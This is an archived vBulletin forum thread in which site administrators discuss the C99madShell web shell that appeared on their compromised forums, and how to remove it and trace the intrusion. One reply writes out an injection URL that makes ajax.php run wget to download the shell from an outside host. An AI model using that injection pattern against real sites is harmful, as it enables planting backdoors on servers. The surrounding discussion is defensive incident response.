vb.org Archive
Page 1 of 2 1 2
Show 40 post(s) from this thread on one page

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   Forum and Server Management (https://vborg.vbsupport.ru/forumdisplay.php?f=232)
-   -   C99madShell v. 2.0 madnet edition (https://vborg.vbsupport.ru/showthread.php?t=202532)

ryan.gottlieb 01-21-2009 02:04 AM
C99madShell v. 2.0 madnet edition
 
I upgraded vBulletin 3.8 from 3.7, and now when ever I try to edit subscriptions, this comes up... its a PHP Shell script....

--------------- Added [DATE]1232510889[/DATE] at [TIME]1232510889[/TIME] ---------------

Ok... it was going back to the init.php file, and told me this line


($hook = vBulletinHook::fetch_hook('init_startup')) ? eval($hook) : false;


I commented that line out (//) and it went away....

--------------- Added [DATE]1232511838[/DATE] at [TIME]1232511838[/TIME] ---------------

solved.... error.php

Dismounted 01-21-2009 03:04 AM
By commenting that line, you are only disabling that hook. It hasn't fixed the hole that allowed the attacker to run the shell in the first place.

ryan.gottlieb 01-27-2009 01:33 AM
No, by SOLVED I meant I removed the script.. (The shell script)

Dismounted 01-27-2009 02:58 AM
That still does not solve how the attacker got the file there. Unless you know that already too?

blowy 08-23-2011 10:50 AM
am having this problem as well.....When I try to edit the payments manager I get the above msg

!C99madShell v. 2.0 madnet edition!

Software: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5. PHP/5.2.13

Marco64Th 08-24-2011 03:56 AM
This is a trojan, just google for it. You should contact your host ASAP to find out how it got into your account and to remove all traces of it.

Crad 08-24-2011 02:01 PM
Um, it's not a Trojan :P

http://www.derekfountain.org/security_c99madshell.php

You've encountered the first evidence that your site has been compromised! Cheers!

TheLastSuperman 08-24-2011 03:06 PM
Quote:
Originally Posted by Crad (Post 2237445)
Um, it's not a Trojan :P

http://www.derekfountain.org/security_c99madshell.php

You've encountered the first evidence that your site has been compromised! Cheers!
Tomato, Tomato or Potato, Potato it does not matter, it's malicious and is still something you do not want to see when navigating the admincp or any other part of your site for that matter and tbo I have no clue why you even posted that last snippet of quick whit, nothing to cheer about until you've removed it :erm:.

daydie 08-24-2011 06:27 PM
they get the file on your server by ajax.php - they use it like forum.com/ajax.php?global=wget http://www.examplewebsite.org/c100.txt

Then they process this from here.

I would recommend vbulletin upgrading / securing the ajax.php asap

Marco64Th 08-25-2011 02:51 AM
Quote:
Originally Posted by Crad (Post 2237445)
Um, it's not a Trojan :P

http://www.derekfountain.org/security_c99madshell.php

You've encountered the first evidence that your site has been compromised! Cheers!
A useless discussion on semantics in my view, the poster that asked the question will understand that it is a serious security issue if i use the word "Trojan".

But how would you call an unwanted script that gives an unauthorized person backdoor access to system functions and data?


All times are GMT. The time now is 10:08 AM.
Page 1 of 2 1 2
Show 40 post(s) from this thread on one page

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01036 seconds
  • Memory Usage 1,733KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (2)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (1)pagenav_pagelink
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (10)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • pagenav_page
  • pagenav_complete
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete